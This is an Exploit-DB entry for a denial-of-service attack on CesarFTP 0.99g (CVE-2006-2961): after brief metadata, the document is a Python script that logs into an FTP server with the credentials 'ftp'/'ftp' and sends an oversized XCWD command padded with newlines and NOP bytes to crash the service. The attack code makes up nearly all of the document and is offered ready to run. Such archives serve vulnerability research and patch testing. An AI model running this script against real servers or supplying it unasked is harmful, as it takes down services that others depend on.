CesarFTP 0.99g - XCWD Denial of Service
Author: Irving Aguilar
type: dos
platform: windows
port: 21.0
date_added: 2016-01-26
date_updated: 2016-01-26
verified: 1
codes: CVE-2006-2961;OSVDB-26364
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-162544.png
application_url: http://www.exploit-db.comCesarFTP_0.99g.EXE
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()